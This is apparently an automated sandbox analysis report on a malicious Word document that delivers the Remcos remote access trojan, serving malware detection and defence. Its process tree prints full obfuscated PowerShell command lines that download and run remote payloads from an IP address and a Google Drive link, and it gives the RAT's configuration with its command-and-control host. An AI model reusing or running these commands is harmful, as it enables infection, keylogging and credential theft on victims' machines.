Edit tour
Windows
Analysis Report
PO NAHK22012FA00000.docx.doc
Overview
General Information
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w7x64
- WINWORD.EXE (PID: 3492 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\WINWOR D.EXE" /Au tomation - Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5) - EQNEDT32.EXE (PID: 3964 cmdline:
"C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) - mshta.exe (PID: 4040 cmdline:
"C:\Window s\SysWOW64 \mshta.exe " "C:\User s\user\App Data\Roami ng\wennedg reatthings withgoodnw esforentri e.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A) - powershell.exe (PID: 3180 cmdline:
"C:\Window s\sYSTEm32 \WindOwsPo WErSHEll\v 1.0\PoweRs hELL.exE" "POWERsheL l -ex BYpa ss -n Op -W 1 -C dEvicECRE deNTiALDEp lOYMeNt.eX e ; iex($( iEx('[SysT EM.tEXT.EN cODING]'+[ Char]58+[c hAr]58+'ut f8.GeTStri NG([sysTem .CONVerT]' +[cHar]0X3 A+[CHAr]0x 3a+'FrOMBA SE64STrINg ('+[ChAR]0 x22+'JEZYM 0s5RDc1Tkt mICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICA9ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBhR GQtdHlQRSA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gLU1FTWJFc mRFZklOSVR Jb04gICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICdbR GxsSW1wb3J 0KCJ1cmxtT 04iLCAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQ2h hclNldCA9I ENoYXJTZXQ uVW5pY29kZ SldcHVibGl jIHN0YXRpY yBleHRlcm4 gSW50UHRyI FVSTERvd25 sb2FkVG9Ga WxlKEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgaGNrY 1BoYixzdHJ pbmcgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIGFXS kxTaU8sc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBTU Gl1VmssdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgTXZ1b mphZ0RWLEl udFB0ciAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgY Ut4U2tndUg pOycgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIC1uQ U1FICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAiciI gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIC1OQU1lc 1BhY2UgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIEd 4ZVNNVkJxI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtUGFzc1R ocnU7ICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAkR lgzSzlENzV OS2Y6OlVST ERvd25sb2F kVG9GaWxlK DAsImh0dHA 6Ly84NS4yM TUuMjA2Ljg yLzI3MC9pZ 2V0YmVzdHR oaW5nc3dpd GhiZXN0cGl jdHVyZXdpd GhncmVhdHR oaW5nc29ub WUudElGIiw iJEVudjpBU FBEQVRBXGd ldGJlc3R0a GluZ3N3aXR oYmVzdHBpY 3R1cmV3aXR oZ3JlYXR0a GluZ3Nvbi5 2YlMiLDAsM Ck7U3RBclQ tU2xlRVAoM yk7U1RBUnQ gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICIkZW5WO kFQUERBVEF cZ2V0YmVzd HRoaW5nc3d pdGhiZXN0c GljdHVyZXd pdGhncmVhd HRoaW5nc29 uLnZiUyI=' +[cHAR]34+ '))')))" MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 2052 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -ex BYpass -nOp -W 1 -C dEvicE CREdeNTiAL DEplOYMeNt .eXe MD5: EB32C070E658937AA9FA9F3AE629B2B8) - csc.exe (PID: 2756 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\j0qjax5r \j0qjax5r. cmdline" MD5: F8F36858B9405FBE27377FD7E8FEC2F2) - cvtres.exe (PID: 2740 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE S8872.tmp" "c:\Users \user\AppD ata\Local\ Temp\j0qja x5r\CSC3F3 0325724544 FF3B51B1BF 07A1EFBCB. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 3068 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\getbe stthingswi thbestpict urewithgre atthingson .vbS" MD5: 979D74799EA6C8B8167869A68DF5204A) - powershell.exe (PID: 1980 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' KCdhVUtpbW FnZVVybCA9 IHp0c2h0dH BzOi8vZCcr J3JpdmUuZ2 9vZ2xlLmNv bS91YycrJz 9leHBvJysn cnQ9ZG93bm xvYWQmaWQ9 MUFJVmdKSk p2MUY2dlM0 c1VPeWJuSC 1zRHZVaEJZ d3VyIHp0cz snKydhVUt3 ZWJDbGllbn QgPSBOZXct T2JqZWN0IF N5c3RlbS5O ZXQuV2ViQ2 xpZW50O2FV S2ltYWdlQn l0ZXMgPSBh VUt3JysnZW JDbGllbnQu RG93bmxvYW REYXRhKGFV S2ltYWdlVX JsKTthVUtp bWFnZVRleC crJ3QgPSBb U3lzdGVtLl RleHQuRW5j b2RpbmddOj pVVEY4Lkdl dFN0cmluZy hhVUtpbWFn ZUJ5dGVzKT thVUtzdGFy dEZsYWcgPS B6dHM8PEJB U0U2NF9TVE FSVD4+enRz O2FVS2VuZE ZsYWcnKycg PSB6dHM8PE JBU0U2NF9F TkQ+Pnp0cz thVUtzdGFy dEluZGV4ID 0gYVVLaW1h Z2VUZXh0Lk luZGV4T2Yo YVVLc3Rhcn RGbGFnKTth VUtlbmRJbm RleCA9IGFV S2ltYWdlVG V4dC5JbmRl eE9mKGFVS2 VuZEZsYWcp O2FVS3N0YX J0SW5kZXgg LWdlIDAgLW FuZCBhVUtl bmRJbmRleC AtZ3QnKycg JysnYVVLc3 RhcnRJbmRl eDthVUtzdC crJ2FydElu ZGV4ICs9IG FVS3N0YXJ0 RmxhZy5MZW 5nJysndGg7 YVVLYmFzZT Y0TGVuZ3Ro ID0gYVVLZW 5kSW5kZXgg LSBhVUtzdG FydEluZGV4 O2FVS2JhJy snc2U2NENv bW1hbmQgPS BhVUtpbWFn ZVRleHQuU3 Vic3RyaW5n KGFVS3N0YX J0SW5kZXgs IGFVS2Jhc2 U2NExlbmd0 aCk7YVVLYm FzZTY0UmV2 ZXJzZWQgPS Atam9pbiAo YVVLYmFzZT Y0Q29tbWFu ZC5Ub0NoYX JBcnJheSgp IGRyYiBGb3 JFYWNoLU9i amVjdCB7IG FVS18gfSlb LTEuLi0oYV VLYmFzZTY0 Q29tbWFuZC 5MZW5ndGgp XTthVUtjb2 1tYW5kQnl0 ZXMgPSBbU3 lzdGVtLkNv bnZlcnRdJy snOjpGcm9t QmFzJysnZT Y0U3RyaW5n KGFVS2Jhc2 U2NFJldmVy c2VkKTthVU tsb2FkZWRB c3NlbWJseS A9IFtTeXN0 ZW0uUmVmbG VjdGlvbi5B c3NlbWJseV 0nKyc6Okxv YWQoYVVLY2 9tbWFuZEJ5 dGVzKTthVU t2YWlNZXRo b2QgPSBbZG 5saWIuSU8u SG9tZV0uR2 V0TWV0Jysn aG9kKHp0c1 ZBSXp0cyk7 YVVLdmFpTW UnKyd0aG9k Lkludm9rZS hhVUtudWxs LCBAKHonKy d0c3R4dC5F Q0RGRlJXLz A3Mi8yOC42 MDIuNTEyLj U4Ly86cHR0 aHp0cywgen RzZGVzYXRp dmFkb3p0Jy sncywgenRz ZGVzJysnYX RpdmEnKydk b3p0cywgen RzZGVzYXRp dmFkb3p0cy wgenRzQ2Fz UG9senRzLC B6dHNkZXNh dGl2YWRven RzLCB6dHNk ZScrJ3NhdG l2YWRvenRz LHp0c2Rlc2 F0aXZhZG96 dHMsenRzJy snZGVzYXRp dmFkb3p0cy x6dHNkZXNh dGl2YWRven QnKydzLHp0 c2Rlc2F0aX ZhZG96dHMs JysnenRzZG VzYXRpdmFk b3p0cyx6dH MxenRzLHp0 c2Rlc2F0aX ZhZG96dHMp KTsnKS5yZX BsYWNFKCdh VUsnLCckJy kucmVwbGFj RSgnenRzJy xbc1RSaW5H XVtjSEFyXT M5KS5yZXBs YWNFKCdkcm InLCd8Jyl8 IC4gKCAkcF NIb01lWzIx XSskUFNob0 1FWzM0XSsn WCcp';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic y bypass - NoProfile -command $ OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8) - powershell.exe (PID: 2924 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "('aUK imageUrl = ztshttps: //d'+'rive .google.co m/uc'+'?ex po'+'rt=do wnload&id= 1AIVgJJJv1 F6vS4sUOyb nH-sDvUhBY wur zts;'+ 'aUKwebCli ent = New- Object Sys tem.Net.We bClient;aU KimageByte s = aUKw'+ 'ebClient. DownloadDa ta(aUKimag eUrl);aUKi mageTex'+' t = [Syste m.Text.Enc oding]::UT F8.GetStri ng(aUKimag eBytes);aU KstartFlag = zts<<BA SE64_START >>zts;aUKe ndFlag'+' = zts<<BAS E64_END>>z ts;aUKstar tIndex = a UKimageTex t.IndexOf( aUKstartFl ag);aUKend Index = aU KimageText .IndexOf(a UKendFlag) ;aUKstartI ndex -ge 0 -and aUKe ndIndex -g t'+' '+'aU KstartInde x;aUKst'+' artIndex + = aUKstart Flag.Leng' +'th;aUKba se64Length = aUKendI ndex - aUK startIndex ;aUKba'+'s e64Command = aUKimag eText.Subs tring(aUKs tartIndex, aUKbase64 Length);aU Kbase64Rev ersed = -j oin (aUKba se64Comman d.ToCharAr ray() drb ForEach-Ob ject { aUK _ })[-1..- (aUKbase64 Command.Le ngth)];aUK commandByt es = [Syst em.Convert ]'+'::From Bas'+'e64S tring(aUKb ase64Rever sed);aUKlo adedAssemb ly = [Syst em.Reflect ion.Assemb ly]'+'::Lo ad(aUKcomm andBytes); aUKvaiMeth od = [dnli b.IO.Home] .GetMet'+' hod(ztsVAI zts);aUKva iMe'+'thod .Invoke(aU Knull, @(z '+'tstxt.E CDFFRW/072 /28.602.51 2.58//:ptt hzts, ztsd esativadoz t'+'s, zts des'+'ativ a'+'dozts, ztsdesati vadozts, z tsCasPolzt s, ztsdesa tivadozts, ztsde'+'s ativadozts ,ztsdesati vadozts,zt s'+'desati vadozts,zt sdesativad ozt'+'s,zt sdesativad ozts,'+'zt sdesativad ozts,zts1z ts,ztsdesa tivadozts) );').repla cE('aUK',' $').replac E('zts',[s TRinG][cHA r]39).repl acE('drb', '|')| . ( $pSHoMe[21 ]+$PShoME[ 34]+'X')" MD5: EB32C070E658937AA9FA9F3AE629B2B8) - CasPol.exe (PID: 3608 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Cas Pol.exe" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61) - CasPol.exe (PID: 3764 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\oe xlux" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61) - CasPol.exe (PID: 3880 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\oe xlux" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61) - CasPol.exe (PID: 3864 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\yy cdupifp" MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61) - CasPol.exe (PID: 3840 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\CasP ol.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\js iovitzdbnf " MD5: 8AD6D0D81FEC2856B8DCABEE8D678F61)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["servemail.exprotedsteel.pro:6498:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-N6HMP4", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "wordse"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen |
| |
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
Click to see the 20 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 8 entries |
Exploits |
---|
Source: | Author: Joe Security: |
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |